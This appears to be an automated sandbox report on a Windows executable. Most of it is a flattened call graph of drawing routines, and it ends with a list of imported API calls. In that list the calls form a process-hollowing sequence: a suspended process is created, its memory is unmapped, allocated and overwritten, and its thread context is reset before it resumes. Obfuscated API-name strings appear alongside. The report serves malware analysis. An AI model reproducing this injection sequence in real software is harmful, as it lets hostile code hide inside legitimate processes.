404850 3239->3439 3241 403011 CopyRect 3242 403e10 7 API calls 3241->3242 3243 403031 CopyRect 3242->3243 3440 404850 3243->3440 3245 403051 CopyRect 3246 403e10 7 API calls 3245->3246 3247 403071 CopyRect 3246->3247 3441 404850 3247->3441 3249 403091 CopyRect 3250 403e10 7 API calls 3249->3250 3251 4030b1 CopyRect 3250->3251 3442 404850 3251->3442 3253 4030d1 CopyRect 3254 403e10 7 API calls 3253->3254 3255 4030f1 CopyRect 3254->3255 3443 404850 3255->3443 3257 403111 CopyRect 3258 403e10 7 API calls 3257->3258 3259 403131 CopyRect 3258->3259 3444 404850 3259->3444 3261 403151 CopyRect 3262 403e10 7 API calls 3261->3262 3263 403171 CopyRect 3262->3263 3445 404850 3263->3445 3265 403191 CopyRect 3266 403e10 7 API calls 3265->3266 3267 4031b1 CopyRect 3266->3267 3446 404850 3267->3446 3269 4031d1 CopyRect 3270 403e10 7 API calls 3269->3270 3271 4031f1 CopyRect 3270->3271 3447 404850 3271->3447 3273 403211 CopyRect 3274 403e10 7 API calls 3273->3274 3275 403231 CopyRect 3274->3275 3448 404850 3275->3448 3277 403251 CopyRect 3278 403e10 7 API calls 3277->3278 3279 403271 CopyRect 3278->3279 3449 404850 3279->3449 3281 403291 CopyRect 3282 403e10 7 API calls 3281->3282 3283 4032b1 CopyRect 3282->3283 3450 404850 3283->3450 3285 4032d1 CopyRect 3286 403e10 7 API calls 3285->3286 3287 4032f1 CopyRect 3286->3287 3451 404850 3287->3451 3289 403311 CopyRect 3290 403e10 7 API calls 3289->3290 3291 403331 CopyRect 3290->3291 3452 404850 3291->3452 3293 403351 CopyRect 3294 403e10 7 API calls 3293->3294 3295 403371 CopyRect 3294->3295 3453 404850 3295->3453 3297 403391 CopyRect 3298 403e10 7 API calls 3297->3298 3299 4033b1 CopyRect 3298->3299 3454 404850 3299->3454 3301 4033d1 CopyRect 3302 403e10 7 API calls 3301->3302 3303 4033f1 CopyRect 3302->3303 3455 404850 3303->3455 3305 403411 CopyRect 3306 403e10 7 API calls 3305->3306 3307 403431 CopyRect 3306->3307 3456 404850 3307->3456 3309 403451 CopyRect 3310 403e10 7 API calls 3309->3310 3311 403471 CopyRect 3310->3311 3457 404850 3311->3457 3313 403491 CopyRect 3314 403e10 7 API calls 3313->3314 3315 4034b1 CopyRect 3314->3315 3458 404850 3315->3458 3317 4034d1 CopyRect 3318 403e10 7 API calls 3317->3318 3319 4034f1 CopyRect 3318->3319 3459 404850 3319->3459 3321 403511 CopyRect 3322 403e10 7 API calls 3321->3322 3323 403531 CopyRect 3322->3323 3460 404850 3323->3460 3325 403551 CopyRect 3326 403e10 7 API calls 3325->3326 3327 403571 CopyRect 3326->3327 3461 404850 3327->3461 3329 403591 CopyRect 3330 403e10 7 API calls 3329->3330 3331 4035b1 CopyRect 3330->3331 3462 404850 3331->3462 3333 4035d1 CopyRect 3334 403e10 7 API calls 3333->3334 3335 4035f1 CopyRect 3334->3335 3463 404850 3335->3463 3337 403611 CopyRect 3338 403e10 7 API calls 3337->3338 3339 403631 CopyRect 3338->3339 3464 404850 3339->3464 3341 403651 CopyRect 3342 403e10 7 API calls 3341->3342 3343 403671 CopyRect 3342->3343 3344 403e10 7 API calls 3343->3344 3345 403691 CopyRect 3344->3345 3465 404360 3345->3465 3347 4036b1 CopyRect 3348 403e10 7 API calls 3347->3348 3349 4036d1 CopyRect 3348->3349 3350 404360 7 API calls 3349->3350 3351 4036f1 CopyRect 3350->3351 3352 403e10 7 API calls 3351->3352 3353 403711 CopyRect 3352->3353 3354 404360 7 API calls 3353->3354 3355 403731 CopyRect 3354->3355 3356 404360 7 API calls 3355->3356 3357 403751 CopyRect 3356->3357 3358 403e10 7 API calls 3357->3358 3359 403771 CopyRect 3358->3359 3360 404360 7 API calls 3359->3360 3361 403791 CopyRect 3360->3361 3362 403e10 7 API calls 3361->3362 3363 4037b1 CopyRect 3362->3363 3364 404360 7 API calls 3363->3364 3365 4037d1 CopyRect 3364->3365 3366 403e10 7 API calls 3365->3366 3367 4037f1 CopyRect 3366->3367 3368 404360 7 API calls 3367->3368 3369 403811 CopyRect 3368->3369 3370 404360 7 API calls 3369->3370 3371 403831 CopyRect 3370->3371 3372 404360 7 API calls 3371->3372 3373 403851 CopyRect 3372->3373 3374 403e10 7 API calls 3373->3374 3375 403871 CopyRect 3374->3375 3376 403e10 7 API calls 3375->3376 3377 403891 CopyRect 3376->3377 3378 404360 7 API calls 3377->3378 3379 4038b1 CopyRect 3378->3379 3380 403e10 7 API calls 3379->3380 3381 4038d1 CopyRect 3380->3381 3382 403e10 7 API calls 3381->3382 3383 4038f1 CopyRect 3382->3383 3384 404360 7 API calls 3383->3384 3385 403911 CopyRect 3384->3385 3386 404360 7 API calls 3385->3386 3387 403931 CopyRect 3386->3387 3388 403e10 7 API calls 3387->3388 3389 403951 CopyRect 3388->3389 3390 404360 7 API calls 3389->3390 3391 403971 CopyRect 3390->3391 3392 404360 7 API calls 3391->3392 3393 403991 CopyRect 3392->3393 3394 404360 7 API calls 3393->3394 3395 4039b1 SetWindowRgn SetCapture 3394->3395 3395->3063 3396->3069 3397->3073 3398->3077 3399->3081 3400->3085 3401->3089 3402->3093 3403->3097 3404->3101 3405->3105 3406->3109 3407->3113 3408->3117 3409->3121 3410->3125 3411->3129 3412->3133 3413->3137 3414->3141 3415->3145 3416->3149 3417->3153 3418->3157 3419->3161 3420->3165 3421->3169 3422->3173 3423->3177 3424->3181 3425->3185 3426->3189 3427->3193 3428->3197 3429->3201 3430->3205 3431->3209 3432->3213 3433->3217 3434->3221 3435->3225 3436->3229 3437->3233 3438->3237 3439->3241 3440->3245 3441->3249 3442->3253 3443->3257 3444->3261 3445->3265 3446->3269 3447->3273 3448->3277 3449->3281 3450->3285 3451->3289 3452->3293 3453->3297 3454->3301 3455->3305 3456->3309 3457->3313 3458->3317 3459->3321 3460->3325 3461->3329 3462->3333 3463->3337 3464->3341 3467 4043a3 3465->3467 3466 40454a 3468 404560 CreatePolygonRgn 3466->3468 3469 4045cb CreatePolygonRgn 3466->3469 3467->3466 3471 4044e9 _ftol _ftol 3467->3471 3470 404570 3468->3470 3475 4045d9 3469->3475 3472 40457b CombineRgn CreatePolygonRgn 3470->3472 3471->3466 3471->3471 3473 40ae02 3472->3473 3474 40459f CombineRgn 3473->3474 3474->3475 3475->3347 3477 40a940 GetWindowRect 3478 40aa54 ClientToScreen 3477->3478 3479 40a99f 3477->3479 3481 40aa52 3478->3481 3479->3481 3489 4052c0 CopyRect 3479->3489 3482 40a9d0 _ftol 3482->3481 3483 40a9ec 3482->3483 3483->3481 3484 40aa08 GetWindowRect 3483->3484 3485 40aa1f 3484->3485 3486 405300 42 API calls 3485->3486 3487 40aa30 SetWindowRgn 3486->3487 3490 40a440 IsIconic 3487->3490 3489->3482 3491 40a474 3490->3491 3493 40a50d 3490->3493 3492 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3491->3492 3501 40a508 3492->3501 3497 40a5b2 LPtoDP 3493->3497 3493->3501 3503 40a640 3493->3503 3494 40a65a GetWindowRect 3495 40a67d 3494->3495 3504 404a40 CopyRect 3495->3504 3498 40a5e5 3497->3498 3499 40a5fd GetMapMode 3498->3499 3500 40b054 3499->3500 3502 40a616 DPtoLP 3500->3502 3501->3481 3502->3503 3503->3494 3505 4039c0 3 API calls 3504->3505 3506 404a71 CopyRect 3505->3506 3507 4039c0 3 API calls 3506->3507 3508 404a91 CopyRect 3507->3508 3509 4039c0 3 API calls 3508->3509 3510 404ab1 CopyRect 3509->3510 3511 4039c0 3 API calls 3510->3511 3512 404ad1 CopyRect 3511->3512 3513 4039c0 3 API calls 3512->3513 3514 404af1 CopyRect 3513->3514 3515 4039c0 3 API calls 3514->3515 3516 404b11 CopyRect 3515->3516 3517 4039c0 3 API calls 3516->3517 3518 404b31 CopyRect 3517->3518 3519 4039c0 3 API calls 3518->3519 3520 404b51 CopyRect 3519->3520 3521 4039c0 3 API calls 3520->3521 3522 404b71 CopyRect 3521->3522 3523 4039c0 3 API calls 3522->3523 3524 404b91 CopyRect 3523->3524 3525 4039c0 3 API calls 3524->3525 3526 404bb1 CopyRect 3525->3526 3527 4039c0 3 API calls 3526->3527 3528 404bd1 CopyRect 3527->3528 3529 4039c0 3 API calls 3528->3529 3530 404bf1 CopyRect 3529->3530 3531 4039c0 3 API calls 3530->3531 3532 404c11 CopyRect 3531->3532 3533 4039c0 3 API calls 3532->3533 3534 404c31 CopyRect 3533->3534 3535 4039c0 3 API calls 3534->3535 3536 404c51 CopyRect 3535->3536 3537 4039c0 3 API calls 3536->3537 3538 404c71 CopyRect 3537->3538 3539 4039c0 3 API calls 3538->3539 3540 404c91 CopyRect 3539->3540 3541 4039c0 3 API calls 3540->3541 3542 404cb1 CopyRect 3541->3542 3543 4039c0 3 API calls 3542->3543 3544 404cd1 CopyRect 3543->3544 3545 4039c0 3 API calls 3544->3545 3546 404cf1 CopyRect 3545->3546 3547 4039c0 3 API calls 3546->3547 3548 404d11 CopyRect 3547->3548 3549 4039c0 3 API calls 3548->3549 3550 404d31 CopyRect 3549->3550 3551 4039c0 3 API calls 3550->3551 3552 404d51 CopyRect 3551->3552 3553 4039c0 3 API calls 3552->3553 3554 404d71 CopyRect 3553->3554 3555 4039c0 3 API calls 3554->3555 3556 404d91 CopyRect 3555->3556 3557 4039c0 3 API calls 3556->3557 3558 404db1 CopyRect 3557->3558 3559 4039c0 3 API calls 3558->3559 3560 404dd1 CopyRect 3559->3560 3561 4039c0 3 API calls 3560->3561 3562 404df1 CopyRect 3561->3562 3563 4039c0 3 API calls 3562->3563 3564 404e11 CopyRect 3563->3564 3565 4039c0 3 API calls 3564->3565 3566 404e31 CopyRect 3565->3566 3567 4039c0 3 API calls 3566->3567 3568 404e51 CopyRect 3567->3568 3569 4039c0 3 API calls 3568->3569 3570 404e71 CopyRect 3569->3570 3571 4039c0 3 API calls 3570->3571 3572 404e91 CopyRect 3571->3572 3573 4039c0 3 API calls 3572->3573 3574 404eb1 3573->3574 3574->3501 3576 40ad00 DrawTextA 2570 40b10f __set_app_type __p__fmode __p__commode 2571 40b17e 2570->2571 2572 40b192 2571->2572 2573 40b186 __setusermatherr 2571->2573 2582 40b280 _controlfp 2572->2582 2573->2572 2575 40b197 _initterm __getmainargs _initterm 2576 40b1eb GetStartupInfoA 2575->2576 2578 40b21f GetModuleHandleA 2576->2578 2583 40b2a2 6CDC4ED0 2578->2583 2581 40b243 exit _XcptFilter 2582->2575 2583->2581 2584 40ac50 TextOutA 2586 40ac10 PtVisible 2587 40a810 2591 409c60 2587->2591 2589 40a838 ReleaseCapture GetWindowRect 2590 40a863 2589->2590 2592 409c6c 2591->2592 2592->2589 3590 40a190 3591 40a198 ReleaseCapture 3590->3591 2593 409e20 2596 409e47 2593->2596 2594 409f76 GetWindowRect 2595 409f99 2594->2595 2605 401040 CopyRect 2595->2605 2598 409ece LPtoDP 2596->2598 2603 409f5c 2596->2603 2599 409f01 2598->2599 2600 409f19 GetMapMode 2599->2600 2601 40b054 2600->2601 2602 409f32 DPtoLP 2601->2602 2602->2603 2603->2594 2604 409fab 2936 4039c0 2605->2936 2607 401071 CopyRect 2942 404670 2607->2942 2609 401091 CopyRect 2610 4039c0 3 API calls 2609->2610 2611 4010b1 CopyRect 2610->2611 2612 404670 3 API calls 2611->2612 2613 4010d1 CopyRect 2612->2613 2614 4039c0 3 API calls 2613->2614 2615 4010f1 CopyRect 2614->2615 2616 404670 3 API calls 2615->2616 2617 401111 CopyRect 2616->2617 2618 4039c0 3 API calls 2617->2618 2619 401131 CopyRect 2618->2619 2620 404670 3 API calls 2619->2620 2621 401151 CopyRect 2620->2621 2622 4039c0 3 API calls 2621->2622 2623 401171 CopyRect 2622->2623 2624 404670 3 API calls 2623->2624 2625 401191 CopyRect 2624->2625 2626 4039c0 3 API calls 2625->2626 2627 4011b1 CopyRect 2626->2627 2628 404670 3 API calls 2627->2628 2629 4011d1 CopyRect 2628->2629 2630 4039c0 3 API calls 2629->2630 2631 4011f1 CopyRect 2630->2631 2632 404670 3 API calls 2631->2632 2633 401211 CopyRect 2632->2633 2634 4039c0 3 API calls 2633->2634 2635 401231 CopyRect 2634->2635 2636 404670 3 API calls 2635->2636 2637 401251 CopyRect 2636->2637 2638 4039c0 3 API calls 2637->2638 2639 401271 CopyRect 2638->2639 2640 404670 3 API calls 2639->2640 2641 401291 CopyRect 2640->2641 2642 4039c0 3 API calls 2641->2642 2643 4012b1 CopyRect 2642->2643 2644 404670 3 API calls 2643->2644 2645 4012d1 CopyRect 2644->2645 2646 4039c0 3 API calls 2645->2646 2647 4012f1 CopyRect 2646->2647 2648 404670 3 API calls 2647->2648 2649 401311 CopyRect 2648->2649 2650 4039c0 3 API calls 2649->2650 2651 401331 CopyRect 2650->2651 2652 404670 3 API calls 2651->2652 2653 401351 CopyRect 2652->2653 2654 4039c0 3 API calls 2653->2654 2655 401371 CopyRect 2654->2655 2656 404670 3 API calls 2655->2656 2657 401391 CopyRect 2656->2657 2658 4039c0 3 API calls 2657->2658 2659 4013b1 CopyRect 2658->2659 2660 404670 3 API calls 2659->2660 2661 4013d1 CopyRect 2660->2661 2662 4039c0 3 API calls 2661->2662 2663 4013f1 CopyRect 2662->2663 2664 404670 3 API calls 2663->2664 2665 401411 CopyRect 2664->2665 2666 4039c0 3 API calls 2665->2666 2667 401431 CopyRect 2666->2667 2668 404670 3 API calls 2667->2668 2669 401451 CopyRect 2668->2669 2670 4039c0 3 API calls 2669->2670 2671 401471 CopyRect 2670->2671 2672 404670 3 API calls 2671->2672 2673 401491 CopyRect 2672->2673 2674 4039c0 3 API calls 2673->2674 2675 4014b1 CopyRect 2674->2675 2676 404670 3 API calls 2675->2676 2677 4014d1 CopyRect 2676->2677 2678 4039c0 3 API calls 2677->2678 2679 4014f1 CopyRect 2678->2679 2680 404670 3 API calls 2679->2680 2681 401511 CopyRect 2680->2681 2682 4039c0 3 API calls 2681->2682 2683 401531 CopyRect 2682->2683 2684 404670 3 API calls 2683->2684 2685 401551 CopyRect 2684->2685 2686 4039c0 3 API calls 2685->2686 2687 401571 CopyRect 2686->2687 2688 404670 3 API calls 2687->2688 2689 401591 CopyRect 2688->2689 2690 4039c0 3 API calls 2689->2690 2691 4015b1 CopyRect 2690->2691 2692 404670 3 API calls 2691->2692 2693 4015d1 CopyRect 2692->2693 2694 4039c0 3 API calls 2693->2694 2695 4015f1 CopyRect 2694->2695 2696 404670 3 API calls 2695->2696 2697 401611 CopyRect 2696->2697 2698 4039c0 3 API calls 2697->2698 2699 401631 CopyRect 2698->2699 2700 404670 3 API calls 2699->2700 2701 401651 CopyRect 2700->2701 2702 4039c0 3 API calls 2701->2702 2703 401671 CopyRect 2702->2703 2704 404670 3 API calls 2703->2704 2705 401691 CopyRect 2704->2705 2706 4039c0 3 API calls 2705->2706 2707 4016b1 CopyRect 2706->2707 2708 404670 3 API calls 2707->2708 2709 4016d1 CopyRect 2708->2709 2710 4039c0 3 API calls 2709->2710 2711 4016f1 CopyRect 2710->2711 2712 404670 3 API calls 2711->2712 2713 401711 CopyRect 2712->2713 2714 4039c0 3 API calls 2713->2714 2715 401731 CopyRect 2714->2715 2716 404670 3 API calls 2715->2716 2717 401751 CopyRect 2716->2717 2718 4039c0 3 API calls 2717->2718 2719 401771 CopyRect 2718->2719 2720 404670 3 API calls 2719->2720 2721 401791 CopyRect 2720->2721 2722 4039c0 3 API calls 2721->2722 2723 4017b1 CopyRect 2722->2723 2724 404670 3 API calls 2723->2724 2725 4017d1 CopyRect 2724->2725 2726 4039c0 3 API calls 2725->2726 2727 4017f1 CopyRect 2726->2727 2728 404670 3 API calls 2727->2728 2729 401811 CopyRect 2728->2729 2730 4039c0 3 API calls 2729->2730 2731 401831 CopyRect 2730->2731 2732 404670 3 API calls 2731->2732 2733 401851 CopyRect 2732->2733 2734 4039c0 3 API calls 2733->2734 2735 401871 CopyRect 2734->2735 2736 404670 3 API calls 2735->2736 2737 401891 CopyRect 2736->2737 2738 4039c0 3 API calls 2737->2738 2739 4018b1 CopyRect 2738->2739 2740 404670 3 API calls 2739->2740 2741 4018d1 CopyRect 2740->2741 2742 4039c0 3 API calls 2741->2742 2743 4018f1 CopyRect 2742->2743 2744 404670 3 API calls 2743->2744 2745 401911 CopyRect 2744->2745 2746 4039c0 3 API calls 2745->2746 2747 401931 CopyRect 2746->2747 2748 404670 3 API calls 2747->2748 2749 401951 CopyRect 2748->2749 2750 4039c0 3 API calls 2749->2750 2751 401971 CopyRect 2750->2751 2752 404670 3 API calls 2751->2752 2753 401991 CopyRect 2752->2753 2754 4039c0 3 API calls 2753->2754 2755 4019b1 CopyRect 2754->2755 2756 404670 3 API calls 2755->2756 2757 4019d1 CopyRect 2756->2757 2758 4039c0 3 API calls 2757->2758 2759 4019f1 CopyRect 2758->2759 2760 404670 3 API calls 2759->2760 2761 401a11 CopyRect 2760->2761 2762 4039c0 3 API calls 2761->2762 2763 401a31 CopyRect 2762->2763 2764 404670 3 API calls 2763->2764 2765 401a51 CopyRect 2764->2765 2766 4039c0 3 API calls 2765->2766 2767 401a71 CopyRect 2766->2767 2768 404670 3 API calls 2767->2768 2769 401a91 CopyRect 2768->2769 2770 4039c0 3 API calls 2769->2770 2771 401ab1 CopyRect 2770->2771 2772 404670 3 API calls 2771->2772 2773 401ad1 CopyRect 2772->2773 2774 4039c0 3 API calls 2773->2774 2775 401af1 CopyRect 2774->2775 2776 404670 3 API calls 2775->2776 2777 401b11 CopyRect 2776->2777 2778 4039c0 3 API calls 2777->2778 2779 401b31 CopyRect 2778->2779 2780 404670 3 API calls 2779->2780 2781 401b51 CopyRect 2780->2781 2782 4039c0 3 API calls 2781->2782 2783 401b71 CopyRect 2782->2783 2784 404670 3 API calls 2783->2784 2785 401b91 CopyRect 2784->2785 2786 4039c0 3 API calls 2785->2786 2787 401bb1 CopyRect 2786->2787 2788 404670 3 API calls 2787->2788 2789 401bd1 CopyRect 2788->2789 2790 4039c0 3 API calls 2789->2790 2791 401bf1 CopyRect 2790->2791 2792 404670 3 API calls 2791->2792 2793 401c11 CopyRect 2792->2793 2794 4039c0 3 API calls 2793->2794 2795 401c31 CopyRect 2794->2795 2796 404670 3 API calls 2795->2796 2797 401c51 CopyRect 2796->2797 2798 4039c0 3 API calls 2797->2798 2799 401c71 CopyRect 2798->2799 2800 404670 3 API calls 2799->2800 2801 401c91 CopyRect 2800->2801 2802 4039c0 3 API calls 2801->2802 2803 401cb1 CopyRect 2802->2803 2804 404670 3 API calls 2803->2804 2805 401cd1 CopyRect 2804->2805 2806 4039c0 3 API calls 2805->2806 2807 401cf1 CopyRect 2806->2807 2808 404670 3 API calls 2807->2808 2809 401d11 CopyRect 2808->2809 2810 4039c0 3 API calls 2809->2810 2811 401d31 CopyRect 2810->2811 2812 404670 3 API calls 2811->2812 2813 401d51 CopyRect 2812->2813 2814 4039c0 3 API calls 2813->2814 2815 401d71 CopyRect 2814->2815 2816 404670 3 API calls 2815->2816 2817 401d91 CopyRect 2816->2817 2818 4039c0 3 API calls 2817->2818 2819 401db1 CopyRect 2818->2819 2820 404670 3 API calls 2819->2820 2821 401dd1 CopyRect 2820->2821 2822 4039c0 3 API calls 2821->2822 2823 401df1 CopyRect 2822->2823 2824 404670 3 API calls 2823->2824 2825 401e11 CopyRect 2824->2825 2826 4039c0 3 API calls 2825->2826 2827 401e31 CopyRect 2826->2827 2828 404670 3 API calls 2827->2828 2829 401e51 CopyRect 2828->2829 2830 4039c0 3 API calls 2829->2830 2831 401e71 CopyRect 2830->2831 2832 404670 3 API calls 2831->2832 2833 401e91 CopyRect 2832->2833 2834 4039c0 3 API calls 2833->2834 2835 401eb1 CopyRect 2834->2835 2836 404670 3 API calls 2835->2836 2837 401ed1 CopyRect 2836->2837 2838 4039c0 3 API calls 2837->2838 2839 401ef1 CopyRect 2838->2839 2840 404670 3 API calls 2839->2840 2841 401f11 CopyRect 2840->2841 2842 4039c0 3 API calls 2841->2842 2843 401f31 CopyRect 2842->2843 2844 404670 3 API calls 2843->2844 2845 401f51 CopyRect 2844->2845 2846 4039c0 3 API calls 2845->2846 2847 401f71 CopyRect 2846->2847 2848 404670 3 API calls 2847->2848 2849 401f91 CopyRect 2848->2849 2850 4039c0 3 API calls 2849->2850 2851 401fb1 CopyRect 2850->2851 2852 404670 3 API calls 2851->2852 2853 401fd1 CopyRect 2852->2853 2854 4039c0 3 API calls 2853->2854 2855 401ff1 CopyRect 2854->2855 2856 404670 3 API calls 2855->2856 2857 402011 CopyRect 2856->2857 2858 4039c0 3 API calls 2857->2858 2859 402031 CopyRect 2858->2859 2860 404670 3 API calls 2859->2860 2861 402051 CopyRect 2860->2861 2862 4039c0 3 API calls 2861->2862 2863 402071 CopyRect 2862->2863 2864 404670 3 API calls 2863->2864 2865 402091 CopyRect 2864->2865 2866 4039c0 3 API calls 2865->2866 2867 4020b1 CopyRect 2866->2867 2868 404670 3 API calls 2867->2868 2869 4020d1 CopyRect 2868->2869 2870 4039c0 3 API calls 2869->2870 2871 4020f1 CopyRect 2870->2871 2872 404670 3 API calls 2871->2872 2873 402111 CopyRect 2872->2873 2874 4039c0 3 API calls 2873->2874 2875 402131 CopyRect 2874->2875 2876 404670 3 API calls 2875->2876 2877 402151 CopyRect 2876->2877 2878 4039c0 3 API calls 2877->2878 2879 402171 CopyRect 2878->2879 2880 404670 3 API calls 2879->2880 2881 402191 CopyRect 2880->2881 2882 4039c0 3 API calls 2881->2882 2883 4021b1 CopyRect 2882->2883 2884 4039c0 3 API calls 2883->2884 2885 4021d1 CopyRect 2884->2885 2948 4040f0 2885->2948 2887 4021f1 CopyRect 2888 4039c0 3 API calls 2887->2888 2889 402211 CopyRect 2888->2889 2890 4040f0 3 API calls 2889->2890 2891 402231 CopyRect 2890->2891 2892 4039c0 3 API calls 2891->2892 2893 402251 CopyRect 2892->2893 2894 4040f0 3 API calls 2893->2894 2895 402271 CopyRect 2894->2895 2896 4040f0 3 API calls 2895->2896 2897 402291 CopyRect 2896->2897 2898 4039c0 3 API calls 2897->2898 2899 4022b1 CopyRect 2898->2899 2900 4040f0 3 API calls 2899->2900 2901 4022d1 CopyRect 2900->2901 2902 4039c0 3 API calls 2901->2902 2903 4022f1 CopyRect 2902->2903 2904 4040f0 3 API calls 2903->2904 2905 402311 CopyRect 2904->2905 2906 4039c0 3 API calls 2905->2906 2907 402331 CopyRect 2906->2907 2908 4040f0 3 API calls 2907->2908 2909 402351 CopyRect 2908->2909 2910 4040f0 3 API calls 2909->2910 2911 402371 CopyRect 2910->2911 2912 4040f0 3 API calls 2911->2912 2913 402391 CopyRect 2912->2913 2914 4039c0 3 API calls 2913->2914 2915 4023b1 CopyRect 2914->2915 2916 4039c0 3 API calls 2915->2916 2917 4023d1 CopyRect 2916->2917 2918 4040f0 3 API calls 2917->2918 2919 4023f1 CopyRect 2918->2919 2920 4039c0 3 API calls 2919->2920 2921 402411 CopyRect 2920->2921 2922 4039c0 3 API calls 2921->2922 2923 402431 CopyRect 2922->2923 2924 4040f0 3 API calls 2923->2924 2925 402451 CopyRect 2924->2925 2926 4040f0 3 API calls 2925->2926 2927 402471 CopyRect 2926->2927 2928 4039c0 3 API calls 2927->2928 2929 402491 CopyRect 2928->2929 2930 4040f0 3 API calls 2929->2930 2931 4024b1 CopyRect 2930->2931 2932 4040f0 3 API calls 2931->2932 2933 4024d1 CopyRect 2932->2933 2934 4040f0 3 API calls 2933->2934 2935 4024f1 2934->2935 2935->2604 2937 4039f4 2936->2937 2938 403b03 _ftol _ftol 2937->2938 2939 403b5e 2937->2939 2941 403bac 2937->2941 2938->2938 2938->2939 2940 403b90 Polygon 2939->2940 2940->2941 2941->2607 2943 4046a5 2942->2943 2944 404776 _ftol _ftol 2943->2944 2945 4047d8 2943->2945 2947 404805 2943->2947 2944->2944 2944->2945 2946 4047eb Polyline 2945->2946 2946->2947 2947->2609 2949 40412b 2948->2949 2950 40423e _ftol _ftol 2949->2950 2951 404299 2949->2951 2953 4042ed 2949->2953 2950->2950 2950->2951 2952 4042c9 PolyPolygon 2951->2952 2952->2953 2953->2887 3592 40ada0 EnableWindow 3593 40a7a0 GetWindowRect 3594 40a7c1 3593->3594 3595 404ec0 24 API calls 3594->3595 3596 40a7e1 SetCapture 3595->3596 3597 40a7f4 3596->3597 2585 40b261 _exit 3046 40b2e3 3047 40b2e8 3046->3047 3050 40b2ba 3047->3050 3051 40b2bf 3050->3051 3052 40b2d4 _setmbcp 3051->3052 3053 40b2dd 3051->3053 3052->3053 2337 405830 2340 40a1b0 2337->2340 2339 405856 2341 40a1d9 2340->2341 2342 40a1fd LoadIconA 2341->2342 2342->2339 2954 40ac30 RectVisible 3476 40acb0 TabbedTextOutA 3575 40ad70 Escape 3577 40ad30 3578 40ad38 3577->3578 3579 40ad3b GrayStringA 3577->3579 3578->3579 3580 4057f0 3581 4057f5 3580->3581 3584 40b0c8 3581->3584 3587 40b09c 3584->3587 3586 40581a 3588 40b0b1 __dllonexit 3587->3588 3589 40b0a5 _onexit 3587->3589 3588->3586 3589->3586
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
